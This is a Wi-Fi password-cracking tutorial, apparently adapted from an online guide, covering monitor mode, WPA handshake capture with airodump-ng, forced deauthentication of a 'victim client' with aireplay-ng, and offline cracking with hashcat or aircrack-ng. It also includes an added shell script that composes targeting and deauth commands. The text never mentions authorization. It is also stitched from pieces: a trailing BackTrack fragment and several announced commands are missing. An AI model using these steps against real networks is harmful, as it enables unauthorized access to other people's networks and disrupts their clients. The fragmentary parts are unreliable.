Install the aircrack-ng suite:

`sudo apt-get install aircrack-ng`

Your wireless interface is probably named `wlan0`, but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode. Afterwards run `iwconfig`; you should now see a new monitor-mode interface listed (likely `mon0` or `wlan0mon`). That monitor interface, not `wlan0`, is what the following commands operate on.

Scan for nearby networks with `airodump-ng` and make a note of the target's BSSID and channel (`CH`) number as displayed by `airodump-ng`, as we will need them both for the next step.

Now use `airodump-ng` to monitor traffic on the target network, using the channel and BSSID values discovered from the previous command. (`airmon-ng` only creates and removes monitor interfaces; it does not capture traffic.) A handshake is only recorded when a client authenticates to the access point while you are listening, so if nothing happens for a while, see the deauth attack further down. The capture is complete once `[ WPA handshake: bc:d3:c9:ef:d2:67` appears at the top right of the screen, just right of the current time, and the MAC shown is the BSSID you are targeting.

Press `ctrl-c` to quit `airodump-ng`. You should see a `.cap` file wherever you told `airodump-ng` to save the capture (likely called `-01.cap`). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
I recommend `hashcat` for password cracking. I've created a simple tool that makes hashcat super easy to use called `naive-hashcat`. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack; keep in mind that uploading a capture hands the service both the network's identifier and its handshake. You can also try your hand at CPU cracking with Aircrack-ng.

naive-hashcat (recommended): before we can crack the password using `naive-hashcat`, we need to convert our `.cap` file to the equivalent hashcat file format `.hccapx`. You can do this easily by either uploading the `.cap` file to https://hashcat.net/cap2hccapx/ or using the `cap2hccapx` tool directly. Note that current hashcat releases have deprecated `.hccapx` and hash mode 2500 in favour of mode 22000 (WPA-PBKDF2-PMKID+EAPOL), whose input file is produced from the `.cap` with `hcxpcapngtool`; the cracking step itself is otherwise the same.

Then run `naive-hashcat`. A cracked password is written to the `POT_FILE` as a line of fields separated by `:`, where the last two fields are the network name and password respectively. If you would like to use `hashcat` without `naive-hashcat` see this page for info.

cracking with aircrack-ng: Aircrack-ng can run a basic dictionary attack against the `.cap` directly on the CPU. If the password is cracked you will see a `KEY FOUND!` message in the terminal followed by the plain text version of the network password.
If no handshake shows up in `airodump-ng` because no client connects while you are listening, you can force one with a deauthentication attack.

Start by using `airodump-ng` to monitor a specific access point (using `-c channel --bssid MAC`) until you see a client (`STATION`) connected. A connected client is listed by its MAC in the `STATION` column, for example `64:BC:0C:48:97:F7`.

Leave `airodump-ng` running and open a new terminal. We will use the `aireplay-ng` command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process. The monitor interface has to be on the access point's channel for this to work (running `airodump-ng` with `-c` keeps it there); `aireplay-ng` reports a channel mismatch and exits otherwise.

Once the deauth packets are sent, head back to your `airodump-ng` process, and with any luck you should now see something like this at the top right: `[ WPA handshake: 9C:5C:8E:C9:AB:C0`. Now that you've captured a handshake you should be ready to crack the network password.

Related tools:

- `wlandump-ng`
- `crunch` to generate 100+GB wordlists on-the-fly
- `macchanger`
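As an added example (not code from the original page or from the aircrack-ng project), the script below automates the bookkeeping in the capture and deauth steps above: it reads the `-01.csv` that `airodump-ng -w` writes next to the `.cap`, looks the target up by ESSID to get its BSSID and channel, finds a client associated with that BSSID, and prints the `airodump-ng` and `aireplay-ng` command lines, falling back to a broadcast deauth (no `-c`) when no client has been seen yet. The CSV is constructed sample data (the MACs reuse the ones quoted in the text and belong to no real network), the column layout is the one airodump-ng writes, and `wlan0mon` is an assumed default interface name.

```shell
#!/bin/sh
# Added example, not from the original page. Parses the CSV that
# "airodump-ng -w <prefix>" writes (<prefix>-01.csv) and composes the
# capture and deauth commands. Sample CSV below is constructed data.
set -eu

SAMPLE_CSV=$(mktemp)
cat > "$SAMPLE_CSV" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
BC:D3:C9:EF:D2:67, 2017-01-01 12:00:00, 2017-01-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -45,      120,        0,   0.  0.  0.  0,   7, HomeNet, 
9C:5C:8E:C9:AB:C0, 2017-01-01 12:00:00, 2017-01-01 12:05:00, 11,  54, WPA2, CCMP, PSK, -70,       80,        0,   0.  0.  0.  0,   7, Neighbr, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
64:BC:0C:48:97:F7, 2017-01-01 12:00:00, 2017-01-01 12:05:00, -50,       33, BC:D3:C9:EF:D2:67,
AA:BB:CC:DD:EE:FF, 2017-01-01 12:00:00, 2017-01-01 12:05:00, -80,        2, (not associated), HomeNet
EOF

# Print "BSSID CHANNEL" for the access point whose ESSID matches exactly.
# Fields are ", "-separated with right-aligned numbers, so split on ", *".
ap_for_essid() {
  awk -F', *' -v want="$1" '
    /^Station MAC/ { exit }                 # the access-point section ends here
    NF >= 14 && $14 == want { print $1, $4; exit }
  ' "$2"
}

# Print the MAC of the first client associated with the given BSSID, or
# nothing if airodump-ng has not seen one yet (empty STATION column).
client_of_bssid() {
  awk -F', *' -v want="$1" '
    /^Station MAC/ { in_sta = 1; next }     # client rows follow this header
    in_sta && NF >= 6 && toupper($6) == toupper(want) { print $1; exit }
  ' "$2"
}

# Compose the airodump-ng capture command and the aireplay-ng deauth command
# for an ESSID. They are printed, not executed: both need root and a
# monitor-mode interface (assumed default: wlan0mon). With no client MAC,
# aireplay-ng gets no -c and the deauth goes to the broadcast address.
handshake_commands() {
  essid=$1; csv=$2; mon=${3:-wlan0mon}
  set -- $(ap_for_essid "$essid" "$csv")
  if [ $# -ne 2 ]; then
    echo "no access point with ESSID '$essid' in $csv" >&2
    return 1
  fi
  bssid=$1; ch=$2
  client=$(client_of_bssid "$bssid" "$csv")
  # Use the ESSID as the -w prefix so the capture lands in <ESSID>-01.cap.
  printf 'airodump-ng -c %s --bssid %s -w %s %s\n' "$ch" "$bssid" "$essid" "$mon"
  if [ -n "$client" ]; then
    printf 'aireplay-ng -0 2 -a %s -c %s %s\n' "$bssid" "$client" "$mon"
  else
    printf 'aireplay-ng -0 2 -a %s %s\n' "$bssid" "$mon"
  fi
}

handshake_commands HomeNet "$SAMPLE_CSV"
```

Run the printed commands from a root shell only after the interface is in monitor mode on the target's channel; the first line keeps it there while the second is run from a second terminal, as described above.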
Type `startx` and press Enter. BackTrack will boot into its graphical interface.

Your wireless card is probably named `wlan0`, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different. Assuming it is `wlan0`, execute the following command to put your wireless card into monitor mode:

The output names the new monitor interface, probably `mon0`, like in the screenshot below. Make note of that.

Run `airodump-ng wlan0` to list the networks in range. (If `airodump-ng wlan0` doesn't work for you, you may want to try the monitor interface instead, e.g. `airodump-ng mon0`.)

In the next command, replace `bssid` and `moninterface` with the BSSID and monitor interface you copied down above:

So if your monitor interface was `mon0` like mine, and your BSSID was `8D:AE:9D:65:1F:B2` (a BSSID I just made up), your command would look like: